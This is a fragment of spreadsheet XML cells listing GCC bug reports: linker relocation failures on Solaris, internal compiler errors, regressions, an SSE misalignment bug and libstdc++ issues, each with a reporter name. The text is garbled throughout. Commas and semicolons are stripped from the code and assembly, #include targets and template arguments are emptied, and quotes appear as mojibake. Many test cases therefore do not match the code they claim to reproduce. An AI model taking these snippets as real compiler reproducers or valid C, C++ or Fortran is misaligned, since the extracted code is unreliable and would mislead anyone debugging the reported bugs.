ld: fatal: relocation error: R_386_GOTOFF: file java/.libs/process-Posix.o: symbol java::lang::PosixProcess::processManager: a GOT relative relocation must reference a local symbol
ld: fatal: relocation error: R_386_GOTOFF: file java/.libs/process-Posix.o: symbol java::lang::PosixProcess::queueLock: a GOT relative relocation must reference a local symbol
ld: fatal: relocation error: R_386_GOTOFF: file java/.libs/process-Posix.o: symbol java::lang::PosixProcess::processManager: a GOT relative relocation must reference a local symbol
ld: fatal: relocation error: R_386_GOTOFF: file java/.libs/process-Posix.o: symbol java::lang::PosixProcess::processManager: a GOT relative relocation must reference a local symbol
ld: fatal: relocation error: R_386_GOTOFF: file java/.libs/process-Posix.o: symbol java::lang::PosixProcess::processManager: a GOT relative relocation must reference a local symbol
ld: fatal: relocation error: R_386_GOTOFF: file java/.libs/process-Posix.o: symbol java::lang::PosixProcess::processManager: a GOT relative relocation must reference a local symbol
ld: fatal: relocation error: R_386_GOTOFF: file java/.libs/process-Posix.o: symbol java::lang::PosixProcess::queueLock: a GOT relative relocation must reference a local symbol
ld: fatal: relocation error: R_386_GOTOFF: file java/.libs/process-Posix.o: symbol java::lang::PosixProcess::processManager: a GOT relative relocation must reference a local symbol
collect2: ld returned 1 exit status
I'm currently investigating if using the native /usr/ccs/bin/as gas 2.17
or gld 2.17 makes a difference.
Environment:
System: SunOS erebus 5.11 snv_60 i86pc i386 i86pc
Architecture: i86pc
host: i386-pc-solaris2.10
build: i386-pc-solaris2.10
target: i386-pc-solaris2.10
configured with: /vol/gcc/src/gcc/configure --prefix=/vol/gcc --with-local-prefix=/vol/gcc --disable-nls --with-gnu-as --with-as=/usr/sfw/bin/gas --disable-multilib --with-gmp=/vol/gcc --with-mpfr=/vol/gcc --enable-languages=cc++fortranjavaobjcada --disable-libmudflap
How-To-Repeat:
Bootstrap mainline as described above.</t>
  </si>
  <si>
    <t>GCC-35364</t>
  </si>
  <si>
    <t>ICE on ia64 with vector declaration inside #pragma omp parallel</t>
  </si>
  <si>
    <t>Overview
========
The following code fails to compile on ia64 platform with standard options. The problem is gone when:
- removing the #pragma or 
- declaring a double instead of a vector or 
- not explicitly assigning a length to the vector
- inlining foo()
Problematic code:
=================
#include 
#include 
class A  {		
	void foo()					
}
void A::foo() {
	#pragma omp parallel 
	{
		std::vector x(0)
	}
}
Steps to reproduce
====================
Compile using 
g++ -Wall -fopenmp -save-temps -o ice.o -c ice.h
Build Date &amp; Platform
=====================
Linux 2.4.21-27.0.4.EL #1 SMP ia64 GNU/Linux
GCC version: SVN revision 131821 (2008-01-25) (I don't know about earlier or later versions)
GCC was configured with
Configured with: ../gcc/configure --prefix=(...) --enable-languages=c++fortran --with-gmp=(...) --with-mpfr=(...) CC=gcc CXX=g++
The bug does not show up on amd64 using the same revision.</t>
  </si>
  <si>
    <t>steigers</t>
  </si>
  <si>
    <t>GCC-55147</t>
  </si>
  <si>
    <t>[4.8 Regression] x86: wrong code for 64-bit load</t>
  </si>
  <si>
    <t>&gt; cat foo.c
unsigned foo(unsigned long long *p int i)
{
    return __builtin_bswap64(p[i])
}
&gt; gcc-4.8.0 -m32 -O1 -S foo.c
foo:
        movl    8(%esp) %edx
        movl    4(%esp) %eax
        movl    (%eax%edx8) %edx
        movl    4(%eax%edx8) %eax
        bswap   %eax
        ret
Note the first movl overwriting the index register %edx.</t>
  </si>
  <si>
    <t>mans</t>
  </si>
  <si>
    <t>GCC-275</t>
  </si>
  <si>
    <t>ICE in `change_address' at emit-rtl.c:1589</t>
  </si>
  <si>
    <t>Internal compiler error in `change_address' at
emit-rtl.c:1589 with -mabi=64 at -O1 and higher.
Test case is committed as gcc/testsuite/g77.f-torture/compile/20000601-2.f
The bug does not occur with gcc-2.95.2.
      SUBROUTINE SGBTRF( M KL KU AB LDAB )
*  Slightly modified version of 20000601-1.f that still ICES with
*  CVS 20010118 g77 on mips-sgi-irix6.5/-mabi=64.
*
*  Originally derived from LAPACK 3.0 test suite failure.
*
*  David Billinghurst (David.Billinghurst@riotinto.com.au)
*  18 January 2001
      INTEGER   KL KU LDAB M
      REAL      AB( LDAB * )
      INTEGER   J JB JJ JP KV KM
      REAL      WORK13(6564) WORK31(6564)
      KV = KU + KL
      DO J = 1 M
         JB = MIN( 1 M-J+1 )
         DO JJ = J J + JB - 1
            KM = MIN( KL M-JJ )
            JP = MAX( KM+1 AB( KV+1 JJ ) )
            CALL SSWAP( JB AB( KV+1+JJ-J J ) LDAB-1
     $           AB( KV+JP+JJ-J J ) LDAB-1 )
         END DO
      END DO
      RETURN
      END
Release:
egcs-20000530
Environment:
mips-sgi-irix6.5
How-To-Repeat:
g77 -c -O1 -mabi=64 20000601-2.f</t>
  </si>
  <si>
    <t>david.billinghurst</t>
  </si>
  <si>
    <t>GCC-5291</t>
  </si>
  <si>
    <t>Bad reference to build directory in libstdc++.la</t>
  </si>
  <si>
    <t>The value of dependency_libs in libstdc++.la contains -L options that
refer to the build directory.  These are coming from libstdcxx_flags in
the toplevel configure.in file.  An installed libtool link file must never
contain a reference to the build or source directory.
Alexandre Oliva commented on this report:
&gt; It's a problem in libtool that has been known for a while and
&gt; already brought in the mailing lists at least twice.  It's mostly
&gt; harmless and no fix is available I'm afraid.
It might be harmless but rather annoying since linker command lines 
get longer and longer :-(
Andreas Jaeger
Release:
3.1 20020105 (experimental)
Environment:
System: Linux sykes 2.4.16-SMP #1 SMP Wed Jan 2 19:54:14 GMT 2002 ia64 unknown
Architecture: ia64
host: ia64-unknown-linux-gnu
build: ia64-unknown-linux-gnu
target: ia64-unknown-linux-gnu
configured with: /cvs/gcc/configure ia64-linux --prefix=/usr/local/ia64-linux --enable-shared --enable-threads --with-system-zlib : (reconfigured)  : (reconfigured)</t>
  </si>
  <si>
    <t>GCC-54955</t>
  </si>
  <si>
    <t>alignas example in gcc 4.8 changes.html won't compile</t>
  </si>
  <si>
    <t>gcc 4.8 changes.html file gives this example:
alignas(double) int i
But the snapshot from Oct 14 2012 gives this message:
g++ -c -std=c++11 alignas.cpp
alignas.cpp:1:1: error: expected unqualified-id before 'alignas'
 alignas(double) int f
 ^
If alignas is moved to the end of the declaration it compiles okay:
int f alignas(double)
doc error?
Could you also confirm whether c++11 keyword alignas is the same as c1x _Alignas?
Thanks and regards</t>
  </si>
  <si>
    <t>mib.bugzilla</t>
  </si>
  <si>
    <t>GCC-56824</t>
  </si>
  <si>
    <t>[4.8 regression] pragma GCC diagnostic push/pop fail with GCC diagnostic ignored -Waggregate-return</t>
  </si>
  <si>
    <t>Created attachment 29784
Simple testcase
If the aggregate-return warning is silenced using
#pragma GCC diagnostic push
#pragma GCC diagnostic ignored -Waggregate-return
and then after a line that triggers the warning the diagnostics are restored using 
#pragma GCC diagnostic pop
 gcc 4.8 issues an aggregate-return warning. This was not the case in versions 4.6 or 4.7.
With the attached test case the following is printed:
$ /opt/gcc-4.7/bin/gcc --version
gcc (GCC) 4.7.0
Copyright (C) 2012 Free Software Foundation Inc.
This is free software see the source for copying conditions.  There is NO
warranty not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
$ /opt/gcc-4.7/bin/gcc -Waggregate-return -c aggregate-return.c
$ /opt/gcc-4.8/bin/gcc --version
gcc (GCC) 4.8.0
Copyright (C) 2013 Free Software Foundation Inc.
This is free software see the source for copying conditions.  There is NO
warranty not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
$ /opt/gcc-4.8/bin/gcc -Waggregate-return -c aggregate-return.c
aggregate-return.c: In function â€˜mainâ€™:
aggregate-return.c:8:13: warning: function call has aggregate value [-Waggregate-return]
  struct foo f = aggregate_return()
             ^
$
No warning is printed by either version if the GCC diagnostic pop is left out.
This regression does not affect (at least some) other warnings e.g. the following test case:
#pragma GCC diagnostic push
#pragma GCC diagnostic ignored -Wunused-variable
int main(int argc char* argv[])
{
        int i
        return 0
}
#pragma GCC diagnostic pop
does not print a warning when compiled with /opt/gcc-4.8/bin/gcc -Wunused-variable -c unused.c.</t>
  </si>
  <si>
    <t>magnus.reftel</t>
  </si>
  <si>
    <t>GCC-64324</t>
  </si>
  <si>
    <t>Deferred character specific functions not permitted in generic operator interface</t>
  </si>
  <si>
    <t>gfortran built from current trunk rejects the following with Error: User operator procedure â€˜tostringâ€™ at (1) cannot be assumed character length
MODULE m
  IMPLICIT NONE
  INTERFACE OPERATOR(.ToString.)
    MODULE PROCEDURE tostring
  END INTERFACE OPERATOR(.ToString.)
CONTAINS
  FUNCTION tostring(arg)
    INTEGER INTENT(IN) :: arg
    CHARACTER(:) ALLOCATABLE :: tostring
    tostring = '42'
  END FUNCTION tostring
END MODULE m
(The procedure has deferred length not assumed length.)
$ gfortran -v -c 2014-12-16\ ToString.f90
Using built-in specs.
COLLECT_GCC=gfortran
Target: x86_64-unknown-linux-gnu
Configured with: .././src/configure --prefix=/home/MEGMS2/ian/usr/gcc-5.0.0 --enable-languages=cc++fortran --enable-libgomp --enable-checking=release
Thread model: posix
gcc version 5.0.0 20141215 (experimental) (GCC) 
COLLECT_GCC_OPTIONS='-v' '-c' '-mtune=generic' '-march=x86-64'
 /home/MEGMS2/ian/usr/gcc-5.0.0/libexec/gcc/x86_64-unknown-linux-gnu/5.0.0/f951 2014-12-16 ToString.f90 -quiet -dumpbase 2014-12-16 ToString.f90 -mtune=generic -march=x86-64 -auxbase 2014-12-16 ToString -version -fintrinsic-modules-path /home/MEGMS2/ian/usr/gcc-5.0.0/lib/gcc/x86_64-unknown-linux-gnu/5.0.0/finclude -o /tmp/cctex4Ju.s
GNU Fortran (GCC) version 5.0.0 20141215 (experimental) (x86_64-unknown-linux-gnu)
	compiled by GNU C version 5.0.0 20141215 (experimental) GMP version 6.0.0 MPFR version 3.1.2 MPC version 1.0.2
GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
GNU Fortran (GCC) version 5.0.0 20141215 (experimental) (x86_64-unknown-linux-gnu)
	compiled by GNU C version 5.0.0 20141215 (experimental) GMP version 6.0.0 MPFR version 3.1.2 MPC version 1.0.2
GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
2014-12-16 ToString.f90:7:2:
   FUNCTION tostring(arg)
  1
Error: User operator procedure â€˜tostringâ€™ at (1) cannot be assumed character length</t>
  </si>
  <si>
    <t>ian_harvey</t>
  </si>
  <si>
    <t>GCC-18949</t>
  </si>
  <si>
    <t>[4.0 Regression] trouble with const_cast in templates</t>
  </si>
  <si>
    <t>Using snapshot 20041212 the attached program no longer compiles
(with gcc33/gcc34 and last weeks snapshot it does)
This program is part of ACE 5.4.2
Michael Cieslinski
g++40 -c -o Any.o Any.ii -v
Reading specs from /usr/local/gcc40d/lib/gcc/x86_64-unknown-linux-
gnu/4.0.0/specs
Configured with: ../gcc40/configure --prefix=/usr/local/gcc40d --program-
suffix=40d --with-arch=opteron --enable-languages=cc++ --enable-checking
Thread model: posix
gcc version 4.0.0 20041212 (experimental)
 /usr/local/gcc40d/libexec/gcc/x86_64-unknown-linux-gnu/4.0.0/cc1plus -
fpreprocessed Any.ii -quiet -dumpbase Any.ii -march=opteron -auxbase-strip 
Any.o -version -o /tmp/ccvyt86g.s
GNU C++ version 4.0.0 20041212 (experimental) (x86_64-unknown-linux-gnu)
        compiled by GNU C version 4.0.0 20041212 (experimental).
GGC heuristics: --param ggc-min-expand=30 --param ggc-min-heapsize=4096
/home/cie019/ace542-gcc40/ACE_wrappers/TAO/tao/Any_Impl_T.cpp: In static member 
function 'static CORBA::Boolean TAO::Any_Impl_T::extract(const CORBA::Any&amp; 
void (*)(void*) CORBA::TypeCode* T*&amp;)':
/home/cie019/ace542-gcc40/ACE_wrappers/TAO/tao/Any_Impl_T.cpp:122: error: 
request for member 'replace' in 'const_cast(any)' which is of non-
class type 'CORBA::Any&amp;'
/home/cie019/ace542-gcc40/ACE_wrappers/TAO/tao/Any_Special_Impl_T.cpp: In 
static member function 'static CORBA::Boolean TAO::Any_Special_Impl_T&lt;T 
from_T to_T&gt;::extract(const CORBA::Any&amp; void (*)(void*) CORBA::TypeCode* 
const T*&amp; CORBA::ULong)':
/home/cie019/ace542-gcc40/ACE_wrappers/TAO/tao/Any_Special_Impl_T.cpp:173: 
error: request for member 'replace' in 'const_cast(any)' which is 
of non-class type 'CORBA::Any&amp;'
/home/cie019/ace542-gcc40/ACE_wrappers/TAO/tao/Any_Dual_Impl_T.cpp: In static 
member function 'static CORBA::Boolean TAO::Any_Dual_Impl_T::extract(const 
CORBA::Any&amp; void (*)(void*) CORBA::TypeCode* const T*&amp;)':
/home/cie019/ace542-gcc40/ACE_wrappers/TAO/tao/Any_Dual_Impl_T.cpp:166: error: 
request for member 'replace' in 'const_cast(any)' which is of non-
class type 'CORBA::Any&amp;'</t>
  </si>
  <si>
    <t>micis</t>
  </si>
  <si>
    <t>GCC-56227</t>
  </si>
  <si>
    <t>Bootstrap failure on MinGW building ggc-page.c</t>
  </si>
  <si>
    <t>Bootstrap is failing in stage 3 with the following error:
../../gcc-4.8-20130203/gcc/ggc-page.c: In function 'void ggc_print_statistics()'
:
../../gcc-4.8-20130203/gcc/ggc-page.c:2174:31: error: unknown conversion type ch
aracter 'l' in format [-Werror=format=]
         G.stats.total_overhead)
                               ^
../../gcc-4.8-20130203/gcc/ggc-page.c:2174:31: error: too many arguments for for
mat [-Werror=format-extra-args]
(and several more identical errors on the subsequent lines)
File was attempted to compile as:
/mingw/src/gcc-build/./prev-gcc/xg++ -B/mingw/src/gcc-build/./prev-gcc/ -B/usr/l
ocal/i686-pc-mingw32/bin/ -nostdinc++ -B/mingw/src/gcc-build/prev-i686-pc-mingw3
2/libstdc++-v3/src/.libs -B/mingw/src/gcc-build/prev-i686-pc-mingw32/libstdc++-v
3/libsupc++/.libs -I/mingw/src/gcc-build/prev-i686-pc-mingw32/libstdc++-v3/inclu
de/i686-pc-mingw32 -I/mingw/src/gcc-build/prev-i686-pc-mingw32/libstdc++-v3/incl
ude -I/mingw/src/gcc-4.8-20130203/libstdc++-v3/libsupc++ -L/mingw/src/gcc-build/
prev-i686-pc-mingw32/libstdc++-v3/src/.libs -L/mingw/src/gcc-build/prev-i686-pc-
mingw32/libstdc++-v3/libsupc++/.libs -c   -g -O2 -D__USE_MINGW_ACCESS -Wno-pedan
tic-ms-format -gtoggle -DIN_GCC   -fno-exceptions -fno-rtti -fasynchronous-unwin
d-tables -W -Wall -Wno-narrowing -Wwrite-strings -Wcast-qual -Wmissing-format-at
tribute -pedantic -Wno-long-long -Wno-variadic-macros -Wno-overlength-strings -W
error   -DHAVE_CONFIG_H -I. -I. -I../../gcc-4.8-20130203/gcc -I../../gcc-4.8-201
30203/gcc/. -I../../gcc-4.8-20130203/gcc/../include -I../../gcc-4.8-20130203/gcc
/../libcpp/include -I/mingw/src/gcc-build/./gmp -I/mingw/src/gcc-4.8-20130203/gm
p -I/mingw/src/gcc-build/./mpfr -I/mingw/src/gcc-4.8-20130203/mpfr -I/mingw/src/
gcc-4.8-20130203/mpc/src  -I../../gcc-4.8-20130203/gcc/../libdecnumber -I../../g
cc-4.8-20130203/gcc/../libdecnumber/bid -I../libdecnumber -I../../gcc-4.8-201302
03/gcc/../libbacktrace    ../../gcc-4.8-20130203/gcc/ggc-page.c -o ggc-page.o
Operating system is Windows 7 / x64.  System compiler is gcc 4.7.2 target mingw32.
prev-gcc/xg++ version is
$ ./prev-gcc/xg++ -v
Using built-in specs.
COLLECT_GCC=C:\MinGW\src\gcc-build\prev-gcc\xg++.exe
Target: i686-pc-mingw32
Configured with: ../gcc-4.8-20130203/configure --enable-languages=cfortranc++
--enable-checking=release
Thread model: win32
gcc version 4.8.0 20130203 (experimental) (GCC)</t>
  </si>
  <si>
    <t>craig.powers</t>
  </si>
  <si>
    <t>GCC-22239</t>
  </si>
  <si>
    <t>[4.0 Regression] i-cobol.adb:482: error: unrecognizable insn</t>
  </si>
  <si>
    <t>../../xgcc -B../../  -c -g -O2 -fPIC -DELF=1 -DLINUX=1      -W -Wall -gnatpg  i-
cobol.adb -o i-cobol.o
i-cobol.adb: In function 'Interfaces.Cobol.To_Display.Convert':
i-cobol.adb:482: error: unrecognizable insn:
(insn 213 77 83 5 i-cobol.adb:466 (set (reg/f:SI 112)
        (minus:SI (plus:SI (reg:SI 156)
                (reg/f:SI 151 [ .result___36 ]))
            (const_int -1 [0xffffffff]))) -1 (nil)
    (nil))
+===========================GNAT BUG DETECTED==============================+
| 4.1.0 20050629 (experimental) (hppa-unknown-linux-gnu) GCC error:        |
| in extract_insn at recog.c:2082                                         |
| Error detected at i-cobol.adb:989:1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raised TYPES.UNRECOVERABLE_ERROR : comperr.adb:380
The instruction is generated in the loop pass here:
(insn 96 95 213 5 i-cobol.adb:466 (set (reg:SI 132)
        (plus:SI (subreg:SI (reg:QI 131) 0)
            (const_int 48 [0x30]))) -1 (nil)
    (nil))
(insn 213 96 97 5 i-cobol.adb:466 (set (reg/f:SI 112)
        (minus:SI (plus:SI (reg:SI 156)
                (reg/f:SI 151 [ .result___36 ]))
            (const_int -1 [0xffffffff]))) -1 (nil)
    (nil))
(insn 97 213 98 5 i-cobol.adb:466 (set (mem/s/j:QI (plus:SI (reg/f:SI 112)
                (const_int -1 [0xffffffff])) [14 S1 A8])
        (subreg:QI (reg:SI 132) 3)) -1 (nil)
    (nil))</t>
  </si>
  <si>
    <t>GCC-3640</t>
  </si>
  <si>
    <t>small lost optimization of x==0 || x==1</t>
  </si>
  <si>
    <t>I noticed a small case where the optimization of x==0 || x==1 to
(unsigned) x &lt;= 1 seems to be lost.
Release:
3.0 (Debian) (Debian testing/unstable)
Environment:
System: Linux blah 2.2.15 #1 Tue Apr 25 17:13:48 EST 2000 i586 unknown
Architecture: i586
host: i386-pc-linux-gnu
build: i386-pc-linux-gnu
target: i386-pc-linux-gnu
configured with: ../src/configure -v --enable-languages=cc++javaf77protoobjc --prefix=/usr --infodir=/share/info --mandir=/share/man --enable-shared --with-gnu-as --with-gnu-ld --with-system-zlib --enable-long-long --enable-nls --without-x --without-included-gettext --disable-checking --enable-threads=posix --enable-java-gc=boehm --with-cpp-install-dir=bin --enable-objc-gc i386-linux
How-To-Repeat:
A file foo.c
        int
        foo (int x unsigned long y)
        {
          if (x == 0 || (x == 1 &amp;&amp; y &lt;= 0xFFFFFFFFU)
            do_something ()
        }
compiled with
        gcc-3.0 -O9 -S foo.c
comes out with the test as
        testl   %eax %eax
        je      .L3
        decl    %eax
        je      .L3
rather than say
        cmp     $1 %eax
        jbe     .L3
That latter comes out for a plain x==0 || x==1 test but it seems
adding y &lt;= 0xFFFFFFFF prevents that optimization despite that
extra condition being always true (for i386).
This perhaps isn't of any great significance but it arose in GMP when
having y as either unsigned long or unsigned long long and leaving
it to gcc to decide what CPUs do or don't need to actually do anything
for a test like y &lt;= UINT_MAX.
For what it's worth the same seems to occur in a debian packaged
pre-release gcc 2.95.4 too.</t>
  </si>
  <si>
    <t>GCC-12902</t>
  </si>
  <si>
    <t>[4.0 Regression] Invalid assembly generated when using SSE / xmmintrin.h</t>
  </si>
  <si>
    <t>I have a code which heavily uses SSE. Some new functions written for the code
seg-faulted due to an unaligned movaps instruction. I stripped one of those
functions down as far as I could to make a self-contained program which
reproduces the bug. That program is attached to the end of this bug report. I
apologize in advance that I could not find a simpler faulting program.
It generates invalid assembly when compiled with gcc-3.3 and gcc-3.3.2 at
optimizations levels -O -O1 -O2 and -O3 when compiled.
The following commands can demonstrate the bug.
% g++-3.3.2 -v
Reading specs from
/home/kbowers/local/bin/../lib/gcc-lib/i686-pc-linux-gnu/3.3.2/specs
Configured with: ../gcc-3.3.2/configure --prefix=/local_home/kbowers
--program-suffix=-3.3.2
Thread model: posix
gcc version 3.3.2
% g++-3.3.2 -S -fverbose-asm -O -msse compiler_bug.cpp
% cat compiler_bug.cpp
... snip to around line 45 ...
	movl	8(%ebp) %eax	#  a
	movlps	(%eax) %xmm3	#  
	movaps	8(%eax) %xmm0
	movlps	%xmm0 -200(%ebp)
	movhps	16(%eax) %xmm3	#  
	movaps	24(%eax) %xmm2
... snip ...
The first instruction loads the value of the a pointer into eax. When the loop
is run a is a 16-byte aligned pointer. The third instruction tries to do an
aligned 16-byte load from a non-aligned address.
Thanks.
---- BEGIN PROGRAM ----
#include 
typedef struct {
  int i
  float f[3]
} a_t
typedef struct {
  float f[8]
} b_t
typedef union {
  int i[4]
  float f[4]
  __m128 v
} vector4
inline void swizzle( const void *a0 const void *a1
                     const void *a2 const void *a3
                     vector4 &amp;a vector4 &amp;b vector4 &amp;c vector4 &amp;d ) {
  __m128 t u
  a.v = _mm_loadl_pi(a.v (__m64 *)a0)
  c.v = _mm_loadl_pi(c.v((__m64 *)a0)+1)
  a.v = _mm_loadh_pi(a.v (__m64 *)a1)
  c.v = _mm_loadh_pi(c.v((__m64 *)a1)+1)
  b.v = a.v
  d.v = c.v
  t   = _mm_loadl_pi(b.v (__m64 *)a2)    // b.v to avoid warn
  u   = _mm_loadl_pi(d.v((__m64 *)a2)+1) // d.v to avoid warn
  t   = _mm_loadh_pi(t (__m64 *)a3)
  u   = _mm_loadh_pi(u((__m64 *)a3)+1)
  a.v = _mm_shuffle_ps(a.vt0x88)
  b.v = _mm_shuffle_ps(b.vt0xdd)
  c.v = _mm_shuffle_ps(c.vu0x88)
  d.v = _mm_shuffle_ps(d.vu0xdd)
}
void foo( const a_t *a const b_t *b int n ) {
  vector4 ai a0 a1 a2 b0 b1 v0 v1 v2
  __m128 *p0 *p1 *p2 *p3
  for(nn--a+=4) {
    swizzle(aa+1a+2a+3aia0a1a2)
    p0 = (__m128 *)(b + ai.i[0])
    p1 = (__m128 *)(b + ai.i[1])
    p2 = (__m128 *)(b + ai.i[2])
    p3 = (__m128 *)(b + ai.i[3])
    swizzle(p0++p1++p2++p3++b0v0v1v2)
    b0.v = _mm_add_ps(                _mm_add_ps(b0.v_mm_mul_ps(a1.vv0.v))
                      _mm_mul_ps(a2.v_mm_add_ps(v1.v_mm_mul_ps(a1.vv2.v))))
    swizzle(p0p1p2p3b1v0v1v2)
    b1.v = _mm_add_ps(                _mm_add_ps(b1.v_mm_mul_ps(a2.vv0.v))
                      _mm_mul_ps(a0.v_mm_add_ps(v1.v_mm_mul_ps(a2.vv2.v))))
  }
}
---- END PROGRAM ----</t>
  </si>
  <si>
    <t>kbowers</t>
  </si>
  <si>
    <t>GCC-40684</t>
  </si>
  <si>
    <t>ICE in tsubst</t>
  </si>
  <si>
    <t>// { dg-options -std=c++0x }
struct A
{
}
template 
typename S::A
foo (S c T t U u)
{
}
struct B
{
  struct C
  {
    template 
    C (U t)
    {
      A a
      A b = foo (this a t)
    }
  } c
  B () : c (A ())
  {
  }
}
int
main ()
{
  B f
}
ICEs in tsubst (seeing ADDR_EXPR there).  This is likely invalid testcase though the ICE is the only diagnostics issued whether the original
testcase from http://bugzilla.redhat.com/509596 is valid or not is unclear.</t>
  </si>
  <si>
    <t>GCC-64922</t>
  </si>
  <si>
    <t>[5 Regression] runtime error: member call on misaligned address for type 'struct _Rep'</t>
  </si>
  <si>
    <t>Compile x.cc with -fsanitize=alignmentboolenum -O2 -D_GLIBCXX_USE_CXX11_ABI=0.  Then run the generated binary:
$ ./a.out d_mos1.model
/home/marek/x/trunk/x86_64-unknown-linux-gnu/libstdc++-v3/include/bits/basic_string.h:2941:9: runtime error: member call on misaligned address 0xffffffffffffffe9 for type 'struct _Rep' which requires 8 byte alignment
0xffffffffffffffe9: note: pointer points here
Segmentation fault (core dumped)
That runtime error seems like a bug.  Note that the failure goes away with e.g. -fno-tree-fre.  Without -fsanitize=... it doesn't even segfault which is what makes this bug extremely hard to analyze.  Also I haven't manage to reduce the test case more.
$ cat d_mos1.model
/**/
$ cat x.cc
#include 
class CS_FILE {}
class CS {
private:
  char* _name
  char* _cmd
  int  _cnt
  bool _ok
  int  _length
  static enum MATCH_STYLE {msPARTIAL msIGNORE_CASE msEXACT} _ms
public:
  explicit    CS(CS_FILE const std::string
  int	      cursor()const	{return _cnt}
  bool        stuck(int* last)	{bool ok=*last&lt;_cnt *last=_cnt return !ok}
	    operator bool()const{return _ok}
  char	      peek()const	{return _cmd[_cnt]}
  bool	      ns_more()const	{return peek()!='\0'}
  CS
  bool	      match1(char c)const{return (peek()==c)}
  CS _ok=_cnt&lt;=_length return *this}
  CS
  CS
  CS
  CS
  CS}
}	
template 
inline bool get(CS&amp; cmd const std::string&amp; key T* val)
{
  if (cmd.dmatch(key)) {
    cmd &gt;&gt; '=' &gt;&gt; *val
    return true
  }
  return false
}
template 
inline CS&amp; operator&gt;&gt;(CS&amp; cmd T&amp; val)
{
  val.parse(cmd)
  return cmd
}
class Base
class Code_Block
class Head
class File
class CS
class Base
{
public:
  virtual void parse(CS
  virtual ~Base() {}
}
class Code_Block
  :public Base
{
  const char* _begin
  const char* _end
public:
  void parse(CS
  Code_Block() :_begin(0) _end(0) {}
}
class Head
  :public Base
{
public:
  void parse(CS
}
class File
{
  std::string	_name
  CS		_file
  Head		_head
  Code_Block	_h_headers
public:
  File(const std::string
}
void Code_Block::parse(CS&amp; file) 
{
  file.skipbl().skip1('{')
}
void Head::parse(CS&amp; file)
{
  file.skipto1('*')
}
File::File(const std::string&amp; file_name)
  :_name(file_name)
   _file(CS_FILE() file_name)
{
  get(_file foo 
  int here = _file.cursor()
  for () {
      get(_file X &amp;_h_headers)
      || get(_file X &amp;_h_headers)
      || get(_file X &amp;_h_headers)
    if (_file.stuck(&amp;here))
      break
  }
}
CS::MATCH_STYLE CS::_ms(msPARTIAL)
CS&amp; CS::dmatch(const std::string&amp; s)
{
  asm (: +r (_ms))
  return *this
}
CS::CS(CS_FILE const std::string&amp; name int i)
  :_name(0)
   _cmd(0)
   _cnt(i)
   _ok(true)
   _length(0)
{
  _name = new char[name.length()+1]
  __builtin_strcpy(_name name.c_str())
  _length = 1
  _cmd = new char[_length+2]
  _cmd[_length++] = '\0'
}
CS&amp; CS::skipbl()
{
  while (peek() &amp;&amp; (!isgraph(peek())))
    skip()
  return *this
}
CS&amp; CS::skip1b(char t)
{
  return *this
}
CS&amp; CS::skip1(char t)
{
  if (match1(t))
    skip()
  return *this
}
CS&amp; CS::skipto1(char c)
{
  while (ns_more() &amp;&amp; !match1(c))
    skip()
  return *this
}
int main(int argc char** argv)
{
  File f(argv[1])
}</t>
  </si>
  <si>
    <t>GCC-2957</t>
  </si>
  <si>
    <t>-pedantic: parse error</t>
  </si>
  <si>
    <t xml:space="preserve">	
example below compiled witch -pedantic makes: 
$ g++-3.0 -pedantic foo.cc 
foo.cc: In function `int foo()': 
foo.cc:8: parse error before `' token 
w/o -pedantic it is ok.  
#include  
using namespace std 
template 
int foo() 
{ 
        vector::iterator i /* this line: parse error before '' */ 
} 
int main(){return 0}
Release:
3.0 20010526 (Debian prerelease) (Debian testing/unstable)
Environment:
System: Linux smile 2.2.17 #1 Sun Oct 8 19:26:41 MEST 2000 i686 unknown
Architecture: i686
host: i386-pc-linux-gnu
build: i386-pc-linux-gnu
target: i386-pc-linux-gnu
configured with: ../src/configure -v --enable-languages=cc++javaf77protoobjc --prefix=/usr --infodir=/share/info --mandir=/share/man --enable-shared --with-gnu-as --with-gnu-ld --with-system-zlib --enable-long-long --enable-nls --without-x --without-included-gettext --disable-checking --enable-threads=posix --enable-java-gc=boehm --with-cpp-install-dir=bin --enable-objc-gc i386-linux</t>
  </si>
  <si>
    <t>87000-quiet</t>
  </si>
  <si>
    <t>GCC-42883</t>
  </si>
  <si>
    <t>[4.5 Regression] internal compiler error: in redirect_eh_edge_1 at tree-eh.c:2112</t>
  </si>
  <si>
    <t>This only occurs at positive optimization levels
$ g++-4.5 -c -O0 avtOpenFOAMFileFormat.preprocessed.C   # okay
$ g++-4.5 -c -O1 avtOpenFOAMFileFormat.preprocessed.C 
/home/jed/visit/src/databases/OpenFOAM/avtOpenFOAMFileFormat.C: In member function â€˜vtkUnstructuredGrid* avtOpenFOAMFileFormat::MakeInternalMesh()â€™:
/home/jed/visit/src/databases/OpenFOAM/avtOpenFOAMFileFormat.C:443:23: internal compiler error: in redirect_eh_edge_1 at tree-eh.c:2112
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
$ g++-4.5 -v
Using built-in specs.
COLLECT_GCC=g++-4.5
COLLECT_LTO_WRAPPER=/usr/lib/gcc/x86_64-unknown-linux-gnu/4.5.0/lto-wrapper
Target: x86_64-unknown-linux-gnu
Configured with: ../configure --prefix=/usr --enable-languages=cc++fortran --enable-gold --enable-plugin --enable-threads=posix --enable-__cxa_atexit --enable-clocale=gnu --enable-lto --enable-gnu-unique-object --disable-multilib --disable-libstdcxx-pch --with-tune=generic --with-system-zlib --with-ppl --with-cloog --libdir=/usr/lib --libexecdir=/usr/lib --mandir=/usr/share/man --infodir=/usr/share/info --disable-werror --enable-checking=release --program-suffix=-4.5 --enable-version-specific-runtime-libs : (reconfigured) ../configure --prefix=/usr --enable-languages=cc++fortran --enable-gold --enable-plugin --enable-threads=posix --enable-__cxa_atexit --enable-clocale=gnu --enable-lto --enable-gnu-unique-object --disable-multilib --disable-libstdcxx-pch --with-system-zlib --with-ppl --with-cloog --libdir=/usr/lib --libexecdir=/usr/lib --mandir=/usr/share/man --infodir=/usr/share/info --disable-werror --enable-checking=release --program-suffix=-4.5 --enable-version-specific-runtime-libs
Thread model: posix
gcc version 4.5.0 20100121 (experimental) (GCC)</t>
  </si>
  <si>
    <t>jed</t>
  </si>
  <si>
    <t>GCC-66509</t>
  </si>
  <si>
    <t>the new clang-based assembler in Xcode 7 on 10.11 fails on the libjava/java/lang/reflect/natArray.cc file from FSF gcc 5.1 at -m32</t>
  </si>
  <si>
    <t>Created attachment 35759
